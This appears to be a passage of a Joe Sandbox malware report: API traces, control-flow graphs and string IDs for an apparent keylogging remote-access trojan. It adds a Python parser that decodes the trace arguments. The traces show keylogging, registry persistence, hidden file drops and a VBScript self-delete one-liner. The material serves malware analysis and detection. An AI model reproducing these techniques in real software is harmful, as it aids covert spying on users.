                                                                                                • Instruction Fuzzy Hash: AD41E8B575060277C61877BB890B52E7A56AB81308B50017FEA0256AD3FA7D9C108BEF

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                                                                                                • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                                                                                                • CloseHandle.KERNELBASE(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E4C
                                                                                                • closesocket.WS2_32(000000FF), ref: 00404E5A
                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E91
                                                                                                • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404EA2
                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00404EA9
                                                                                                • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EBA
                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EBF
                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404EC4
                                                                                                • SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404ED1
                                                                                                • CloseHandle.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404ED6
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                                                                • String ID:
                                                                                                • API String ID: 3658366068-0
                                                                                                • Opcode ID: 6e2d3047bbcd54dd6fb538b66de187a0499e62ad67d4cfb628094cbec65cae59
                                                                                                • Instruction ID: 681aebbacbf541c1c6cd6dfca6fba55586e42b113d9ea1c0d4e3a90daa9851ad
                                                                                                • Opcode Fuzzy Hash: 6e2d3047bbcd54dd6fb538b66de187a0499e62ad67d4cfb628094cbec65cae59
                                                                                                • Instruction Fuzzy Hash: DE21EA71154B04AFDB216B26DC49B1BBBA1FF40326F104A2DE2E211AF1CB79B851DB58

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • __Init_thread_footer.LIBCMT ref: 0040AD73
                                                                                                • Sleep.KERNELBASE(000001F4), ref: 0040AD7E
                                                                                                • GetForegroundWindow.USER32 ref: 0040AD84
                                                                                                • GetWindowTextLengthW.USER32(00000000), ref: 0040AD8D
                                                                                                • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040ADC1
                                                                                                • Sleep.KERNEL32(000003E8), ref: 0040AE8F
                                                                                                  • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,?,0040B86A,?,?,?,?,?,00000000), ref: 0040A69D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                                                                                • String ID: [${ User has been idle for $ minutes }$]
                                                                                                • API String ID: 911427763-3954389425
                                                                                                • Opcode ID: d377345d78a366808be41412e7b290511f9ac2305150b6ff54f5f13d0d680043
                                                                                                • Instruction ID: 1462e2e3b317a3feaa81e481452c264ee2198f2d95b6ea563507fc8e19ff55dc
                                                                                                • Opcode Fuzzy Hash: d377345d78a366808be41412e7b290511f9ac2305150b6ff54f5f13d0d680043
                                                                                                • Instruction Fuzzy Hash: 7F51E1716043419BC714FB62D846AAE7795AF84308F10093FF546A22E2EF7C9D44C69F

                                                                                                Control-flow Graph

                                                                                                 (graph image not captured; basic blocks 40da6f through 40dc56, API node: GetLongPathNameW)
                                                                                                APIs
                                                                                                • GetLongPathNameW.KERNELBASE(00000000,?,00000208), ref: 0040DBD5
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: LongNamePath
                                                                                                • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                                                                • API String ID: 82841172-425784914
                                                                                                • Opcode ID: f85e029fdd0af06f03fccea21248521babeaaf2e92215739b0c3fee69db463eb
                                                                                                • Instruction ID: db29472287e64cad03ac4489520097095d7cef5d056ecb8d0020da3553efca3c
                                                                                                • Opcode Fuzzy Hash: f85e029fdd0af06f03fccea21248521babeaaf2e92215739b0c3fee69db463eb
                                                                                                • Instruction Fuzzy Hash: 0A4151715082019AC205F765DC96CAAB7B8AE90758F10053FB146B20E2FFBCAE4DC65B

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • Sleep.KERNELBASE(00001388), ref: 0040A77B
                                                                                                  • Part of subcall function 0040A6B0: CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A788), ref: 0040A6E6
                                                                                                  • Part of subcall function 0040A6B0: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A788), ref: 0040A6F5
                                                                                                  • Part of subcall function 0040A6B0: Sleep.KERNEL32(00002710,?,?,?,0040A788), ref: 0040A722
                                                                                                  • Part of subcall function 0040A6B0: CloseHandle.KERNELBASE(00000000,?,?,?,0040A788), ref: 0040A729
                                                                                                • CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 0040A7B7
                                                                                                • GetFileAttributesW.KERNELBASE(00000000), ref: 0040A7C8
                                                                                                • SetFileAttributesW.KERNELBASE(00000000,00000080), ref: 0040A7DF
                                                                                                • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 0040A859
                                                                                                  • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A87E), ref: 0041C52F
                                                                                                • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466478,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A962
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                                                                • String ID: HSG$HSG
                                                                                                • API String ID: 3795512280-2729845973
                                                                                                • Opcode ID: 95e1188c70c2f0aca1c1fb60b6c909fd9fd4bcc360802c31494b417a9d188160
                                                                                                • Instruction ID: b4a8632174cffc949347442128fe52ffedc09667b4c22c284aa084888e76bad6
                                                                                                • Opcode Fuzzy Hash: 95e1188c70c2f0aca1c1fb60b6c909fd9fd4bcc360802c31494b417a9d188160
                                                                                                • Instruction Fuzzy Hash: AC518D716043015ACB15BB72C866ABE77AA9F80349F00483FF642B71E2DF7C9D09865E

                                                                                                Control-flow Graph

                                                                                                 (graph image not captured; basic blocks 41c482 through 41c515, API nodes: CreateFileW, SetFilePointer, WriteFile, CloseHandle)
                                                                                                APIs
                                                                                                • CreateFileW.KERNELBASE(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00466478,00000000,00000000,0040D434,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041C4C1
                                                                                                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002), ref: 0041C4DE
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0041C4EA
                                                                                                • WriteFile.KERNELBASE(00000000,00000000,00000000,?,00000000), ref: 0041C4FB
                                                                                                • CloseHandle.KERNELBASE(00000000), ref: 0041C508
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: File$CloseHandle$CreatePointerWrite
                                                                                                • String ID: xpF
                                                                                                • API String ID: 1852769593-354647465
                                                                                                • Opcode ID: 03b5af7f289a82a83928ea742180afc1da621273c2f808e1c0dcbcf6c59c1bfa
                                                                                                • Instruction ID: 0233a984b642d2e84dd4fc2cab076f06cd7f632185dc4648213adf39284592b7
                                                                                                • Opcode Fuzzy Hash: 03b5af7f289a82a83928ea742180afc1da621273c2f808e1c0dcbcf6c59c1bfa
                                                                                                • Instruction Fuzzy Hash: 6311E571288215BFE7104A24ACC8EBB739CEB46365F10862BF912D22D0C624DC418639
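The API lists above print every argument as a raw 8-digit hex stack slot, so the install and self-delete behaviour has to be read off the numbers: CreateFileW(…,40000000,…,00000002,00000080,…) at 0041C4C1 is GENERIC_WRITE with CREATE_ALWAYS and FILE_ATTRIBUTE_NORMAL, followed by SetFilePointer with move method 2 (FILE_END) and WriteFile; SetFileAttributesW(…,00000006) at 0040A962 sets HIDDEN|SYSTEM on the dropped file; Sleep(00001388) at 0040A77B is a 5000 ms delay. The report also prints more slots than the API has parameters (Sleep shows five), so slots past the real parameter count are call-site stack context, which is how the VBScript one-liner `fso.DeleteFile(Wscript.ScriptFullName)` ends up visible in the CreateFileW line. The following parser, an added example and not Joe Sandbox's or the sample's code, decodes such lines; its constant tables are the documented Win32 values, and the sample input is six lines copied from this report's API lists.

```python
"""Parse Joe Sandbox API-trace lines and decode the raw Win32 argument values.

Added example for reading this report; not Joe Sandbox code and not the sample's.
The constant tables are the documented Win32 values.
"""
import re
from typing import Callable, Dict, List, Optional

# One line from an "APIs" list, e.g.
#   • CreateFileW.KERNELBASE(00000000,40000000,...), ref: 0041C4C1
#   • Part of subcall function 0040A6B0: CreateFileW.KERNELBASE(...), ref: 0040A6E6
#   • WSAGetLastError.WS2_32 ref: 00404A21          (no argument list at all)
# \u2022 is the bullet the report puts in front of each call.
API_LINE = re.compile(
    r"^\s*(?:\u2022\s*)?(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<func>\w+)\.(?P<mod>\w+)(?:\((?P<args>.*)\))?"
    r"(?:,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+))?\s*$"
)
HEX32 = re.compile(r"^[0-9A-Fa-f]{8}$")  # every resolved stack slot is 8 hex digits

GENERIC_ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
                  0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
SHARE_MODE = {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE", 0x4: "FILE_SHARE_DELETE"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
               4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
FILE_ATTRS = {0x1: "FILE_ATTRIBUTE_READONLY", 0x2: "FILE_ATTRIBUTE_HIDDEN",
              0x4: "FILE_ATTRIBUTE_SYSTEM", 0x20: "FILE_ATTRIBUTE_ARCHIVE",
              0x80: "FILE_ATTRIBUTE_NORMAL", 0x100: "FILE_ATTRIBUTE_TEMPORARY",
              0x04000000: "FILE_FLAG_DELETE_ON_CLOSE"}
MOVE_METHOD = {0: "FILE_BEGIN", 1: "FILE_CURRENT", 2: "FILE_END"}

Decoder = Callable[[int], object]


def decode_flags(value: int, table: Dict[int, str]) -> List[str]:
    """Expand a bitmask into its named bits; bits missing from the table stay as hex."""
    names = [name for bit, name in sorted(table.items()) if value & bit]
    known = sum(bit for bit in table if value & bit)
    if value & ~known:
        names.append(hex(value & ~known))
    return names


def _flags(table: Dict[int, str]) -> Decoder:
    return lambda v: decode_flags(v, table)


def _enum(table: Dict[int, str]) -> Decoder:
    return lambda v: table.get(v, hex(v))


# parameter index -> (name, decoder) for the calls this report shows repeatedly.
# Only the leading slots are real parameters (CreateFileW has seven, Sleep one);
# the report prints stack slots past that, so later slots are call-site context.
PARAM_DECODERS: Dict[str, Dict[int, tuple]] = {
    "CreateFileW": {1: ("dwDesiredAccess", _flags(GENERIC_ACCESS)),
                    2: ("dwShareMode", _flags(SHARE_MODE)),
                    4: ("dwCreationDisposition", _enum(DISPOSITION)),
                    5: ("dwFlagsAndAttributes", _flags(FILE_ATTRS))},
    "SetFileAttributesW": {1: ("dwFileAttributes", _flags(FILE_ATTRS))},
    "SetFilePointer": {3: ("dwMoveMethod", _enum(MOVE_METHOD))},
    "Sleep": {0: ("dwMilliseconds", lambda v: v)},
}


def _hex(arg: str) -> Optional[int]:
    """Integer for an 8-digit hex slot; None for '?' or an inline string argument."""
    return int(arg, 16) if HEX32.match(arg) else None


def decode_args(func: str, args: List[str]) -> Dict[str, object]:
    out: Dict[str, object] = {}
    for idx, (name, decoder) in PARAM_DECODERS.get(func, {}).items():
        if idx < len(args):
            val = _hex(args[idx])
            if val is not None:
                out[name] = decoder(val)
    return out


def parse_line(line: str) -> Optional[dict]:
    m = API_LINE.match(line)
    if not m:
        return None
    raw = m.group("args")
    # Splitting on commas is safe for the report's own lines: inline strings such
    # as fso.DeleteFile(Wscript.ScriptFullName) contain none.
    args = raw.split(",") if raw else []
    return {"func": m.group("func"), "module": m.group("mod"), "ref": m.group("ref"),
            "subcall_of": m.group("sub"), "args": args,
            "decoded": decode_args(m.group("func"), args)}


def parse_report(lines: List[str]) -> List[dict]:
    return [rec for rec in map(parse_line, lines) if rec is not None]


def find_self_delete_stub(records: List[dict]) -> List[str]:
    """Call sites where CreateFileW is opened for writing while the VBScript
    self-delete one-liner sits in a stack slot: the dropper writing its cleanup .vbs."""
    return [r["ref"] for r in records
            if r["func"] == "CreateFileW"
            and "GENERIC_WRITE" in r["decoded"].get("dwDesiredAccess", [])
            and any("Wscript.ScriptFullName" in a for a in r["args"])]


# Constructed sample input: six lines copied from this report's API lists.
SAMPLE_LINES = [
    "• CreateFileW.KERNELBASE(00000000,40000000,00000000,00000000,00000002,00000080,"
    "00000000,00000000,00000000,00466478,00000000,00000000,0040D434,00000000,00000000,"
    "fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041C4C1",
    "• SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002), ref: 0041C4DE",
    "• SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466478,?,00000000,"
    "00000000,00000000,00000000,00000000), ref: 0040A962",
    "• Sleep.KERNELBASE(00001388), ref: 0040A77B",
    "• WSAGetLastError.WS2_32 ref: 00404A21",
    "  • Part of subcall function 0040A6B0: CreateFileW.KERNELBASE(00000000,80000000,"
    "00000007,00000000,00000003,00000080,00000000,?,?,?,0040A788), ref: 0040A6E6",
]

if __name__ == "__main__":
    records = parse_report(SAMPLE_LINES)
    for rec in records:
        print(rec["func"], rec["ref"], rec["decoded"])
    print("self-delete stub written at:", find_self_delete_stub(records))
```

The `find_self_delete_stub` check is deliberately narrow: it keys on the write-access open plus the `Wscript.ScriptFullName` string that this report shows at the call site, not on CreateFileW in general, so a read-only open of the same path (the `OPEN_EXISTING` call from 0040A6B0) is not reported.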

                                                                                                Control-flow Graph

                                                                                                 (graph image not captured; basic blocks 41b354 through 41b410, API node: StrToIntA)
                                                                                                APIs
                                                                                                  • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                                                                  • Part of subcall function 004135E1: RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 00413605
                                                                                                  • Part of subcall function 004135E1: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00413622
                                                                                                  • Part of subcall function 004135E1: RegCloseKey.KERNELBASE(?), ref: 0041362D
                                                                                                • StrToIntA.SHLWAPI(00000000,0046CA08,00000000,00000000,00000000,004750F4,00000003,Exe,00000000,0000000E,00000000,004660CC,00000003,00000000), ref: 0041B3CD
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseCurrentOpenProcessQueryValue
                                                                                                • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                                • API String ID: 1866151309-2070987746
                                                                                                • Opcode ID: e87868676888afa6acbcf2b8ae3b58c9d8f29422fe8472525f73cbbb67b66dd9
                                                                                                • Instruction ID: 99e2d84e4b8fa31c947f893a9fcbf762d6d1118dcb79bce5eaccee633664c5dc
                                                                                                • Opcode Fuzzy Hash: e87868676888afa6acbcf2b8ae3b58c9d8f29422fe8472525f73cbbb67b66dd9
                                                                                                • Instruction Fuzzy Hash: 0311C47064414926C700F7659C97BFF76198B80304F94453BF806A71D3FB6C598683EE

Control-flow Graph
control_flow_graph 1382 40a6b0-40a6c0 1383 40a6c6-40a6c8 1382->1383 1384 40a75d-40a760 1382->1384 1385 40a6cb-40a6f1 call 401f04 CreateFileW 1383->1385 1388 40a731 1385->1388 1389 40a6f3-40a701 GetFileSize 1385->1389 1392 40a734-40a738 1388->1392 1390 40a703 1389->1390 1391 40a728-40a72f CloseHandle 1389->1391 1393 40a705-40a70b 1390->1393 1394 40a70d-40a714 1390->1394 1391->1392 1392->1385 1395 40a73a-40a73d 1392->1395 1393->1391 1393->1394 1396 40a716-40a718 call 40b117 1394->1396 1397 40a71d-40a722 Sleep 1394->1397 1395->1384 1398 40a73f-40a746 1395->1398 1396->1397 1397->1391 1398->1384 1400 40a748-40a758 call 409097 call 40a1b4 1398->1400 1400->1384
APIs
• CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A788), ref: 0040A6E6
• GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A788), ref: 0040A6F5
• Sleep.KERNEL32(00002710,?,?,?,0040A788), ref: 0040A722
• CloseHandle.KERNELBASE(00000000,?,?,?,0040A788), ref: 0040A729
Strings
Memory Dump Source
• Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
Yara matches
Similarity
• API ID: File$CloseCreateHandleSizeSleep
• String ID: hQG
• API String ID: 1958988193-4070439852
• Opcode ID: 6ecf9d3ddebe9b008ab1d83f498866658564dad8f2fc55020f3775752d25f7c1
• Instruction ID: fcd55a72cf9b38ed92eee25b8fc798016c5179a181dae4a4499eb8880f316315
• Opcode Fuzzy Hash: 6ecf9d3ddebe9b008ab1d83f498866658564dad8f2fc55020f3775752d25f7c1
• Instruction Fuzzy Hash: 3E113130600740AADA30A7249889A1F37BAD741356F44483EE182676D3C67DDC64C71F

Control-flow Graph
APIs
• CreateThread.KERNELBASE(00000000,00000000,0040A2B8,?,00000000,00000000), ref: 0040A239
• CreateThread.KERNELBASE(00000000,00000000,Function_0000A2A2,?,00000000,00000000), ref: 0040A249
• CreateThread.KERNELBASE(00000000,00000000,Function_0000A2C4,?,00000000,00000000), ref: 0040A255
  • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B1AD
  • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
Strings
Memory Dump Source
• Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
Yara matches
Similarity
• API ID: CreateThread$LocalTimewsprintf
• String ID: Offline Keylogger Started
• API String ID: 465354869-4114347211
• Opcode ID: 098326c162aceabd9f0c0eb4b3a82a63fe043fb3064ffd9179b7d27db5e713f4
• Instruction ID: fa9a7328340dc7f48b0d085764b542104813bfc3ea66268f7111ac5d0199d402
• Opcode Fuzzy Hash: 098326c162aceabd9f0c0eb4b3a82a63fe043fb3064ffd9179b7d27db5e713f4
• Instruction Fuzzy Hash: 1111ABB12003187ED210BB368C87CBB765DDA4139CB40057FF946221C2EA795D14CAFB

APIs
• RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004137B9
• RegSetValueExA.KERNELBASE(?,004674C8,00000000,?,00000000,00000000,00475300,?,?,0040F88E,004674C8,5.2.0 Pro), ref: 004137E1
• RegCloseKey.KERNELBASE(?,?,?,0040F88E,004674C8,5.2.0 Pro), ref: 004137EC
Strings
Memory Dump Source
• Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
Yara matches
Similarity
• API ID: CloseCreateValue
• String ID: pth_unenc
• API String ID: 1818849710-4028850238
• Opcode ID: 4470799dcfde6683a975b44515cd928480e6138ab46ed270d1b1aebcf1de6a3b
• Instruction ID: b09b06e14e5a963f4ed757ac8f346f2723baee7be417271cc0de3610a50c6458
• Opcode Fuzzy Hash: 4470799dcfde6683a975b44515cd928480e6138ab46ed270d1b1aebcf1de6a3b
• Instruction Fuzzy Hash: A4F06272500218FBDF00AFA1DC45DEA376CEF04751F108566FD1AA61A1DB359E14DB54

APIs
• CreateMutexA.KERNELBASE(00000000,00000001,00000000,0040EC43,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,004660CC,00000003,00000000), ref: 0040D0B3
• GetLastError.KERNEL32 ref: 0040D0BE
Strings
Memory Dump Source
• Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
Yara matches
Similarity
• API ID: CreateErrorLastMutex
• String ID: 0SG
• API String ID: 1925916568-2718230054
• Opcode ID: bc77eaf552dd10d8f01c03cd32d716e6d6dac4663c01f768c58145daaeb2b4d9
• Instruction ID: 897831e38bae895769414ba5eaefcaa992d87aaaa8244aa01aad5f1db7de32a1
• Opcode Fuzzy Hash: bc77eaf552dd10d8f01c03cd32d716e6d6dac4663c01f768c58145daaeb2b4d9
• Instruction Fuzzy Hash: 62D012B0614301EBDB0467709C5975936559B44702F50487AB50BD95F1CBFC88D08519

APIs
• send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
• WaitForSingleObject.KERNEL32(?,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474F08,?), ref: 00404B47
• SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,?,00474F08,?,?,?,?,?,?,0040547D), ref: 00404B75
Memory Dump Source
• Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
Yara matches
Similarity
• API ID: EventObjectSingleWaitsend
• String ID:
• API String ID: 3963590051-0
• Opcode ID: a6ddc366ca1b1ff27a8fbd3193a8b6bac2d22d3b1e5d5d6e63c0c915f383fbf5
• Instruction ID: ade4869c8039bafc3f5202e75afdfb18787be874a76dce876c460fae4797ad88
• Opcode Fuzzy Hash: a6ddc366ca1b1ff27a8fbd3193a8b6bac2d22d3b1e5d5d6e63c0c915f383fbf5
• Instruction Fuzzy Hash: 152124B2900119BBCB04ABA1DC95DEEB77CFF14314B00452FF515B71E2EB38AA15C6A4

APIs
• RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 00413605
• RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00413622
• RegCloseKey.KERNELBASE(?), ref: 0041362D
Memory Dump Source
• Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
Yara matches
Similarity
• API ID: CloseOpenQueryValue
• String ID:
• API String ID: 3677997916-0
• Opcode ID: 6d7bb055a41a46af3afbf88891c67b332a8db22587d044117d184b09d82707ea
• Instruction ID: 0661f39b514c0023b6096d8878825bbc81d19e8e8981dfb5b132c5fecbfe39b6
• Opcode Fuzzy Hash: 6d7bb055a41a46af3afbf88891c67b332a8db22587d044117d184b09d82707ea
• Instruction Fuzzy Hash: 4A01D676900228FBCB209B91DC08DEF7F7DDB44B51F004066BB05A2240DA748E45DBA4

APIs
• RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,00000000,00475300), ref: 0041374F
• RegQueryValueExA.KERNELBASE(00000000,00000000,00000000,00000000,00000208,?), ref: 00413768
• RegCloseKey.KERNELBASE(00000000), ref: 00413773
Memory Dump Source
• Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
Yara matches
Similarity
• API ID: CloseOpenQueryValue
• String ID:
• API String ID: 3677997916-0
• Opcode ID: 16fdc48d36bb649990d7f6d81c9afeb312c2f40a16629baa57fa9ba92c9a975a
• Instruction ID: cdc8bb2f12cdea1da97e3e4d454c68039a4c25ad8704162e95ac064a0ac82555
• Opcode Fuzzy Hash: 16fdc48d36bb649990d7f6d81c9afeb312c2f40a16629baa57fa9ba92c9a975a
• Instruction Fuzzy Hash: C301AD7540022DFBDF215F91DC04DEB3F38EF05761F008065BE09620A1E7358AA5EB94

APIs
• RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 004135A4
• RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,00475300), ref: 004135C2
• RegCloseKey.KERNELBASE(?), ref: 004135CD
Memory Dump Source
• Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
Yara matches
Similarity
• API ID: CloseOpenQueryValue
• String ID:
• API String ID: 3677997916-0
• Opcode ID: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
• Instruction ID: 3ea041f737baa467864e73cd7e114674dd940ed34319bd14b5ec79364d8ab256
• Opcode Fuzzy Hash: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
• Instruction Fuzzy Hash: 39F01D76900218FFDF109FA09C45FEE7BBDEB04B11F1044A5BA04E6191D6359F549B94

APIs
• RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?,00000000,?,?,0040C1D7,00466C58), ref: 00413551
• RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,00000000,?,?,0040C1D7,00466C58), ref: 00413565
• RegCloseKey.KERNELBASE(?,?,?,0040C1D7,00466C58), ref: 00413570
Memory Dump Source
• Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
Yara matches
Similarity
• API ID: CloseOpenQueryValue
• String ID:
• API String ID: 3677997916-0
• Opcode ID: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
• Instruction ID: 960a54a16a1ccd4152458ec6927d20d37e2092670a33f2d7c306b576a706ad25
• Opcode Fuzzy Hash: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
• Instruction Fuzzy Hash: 23E06532801238FBDF204FA29C0DDEB7F6CDF06BA1B000155BD0CA1111D2258E50E6E4

APIs
• RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
• RegSetValueExA.KERNELBASE(004660B4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138DB
• RegCloseKey.ADVAPI32(004660B4,?,?,?,0040C18D,00466C58,00000001,000000AF,004660B4), ref: 004138E6
Memory Dump Source
• Source File: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd
Yara matches
Similarity
• API ID: CloseCreateValue
• String ID:
• API String ID: 1818849710-0
• Opcode ID: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
• Instruction ID: 04d77b696783773a8a307df6842786532c8303179302b097fa31242bc3118ae5
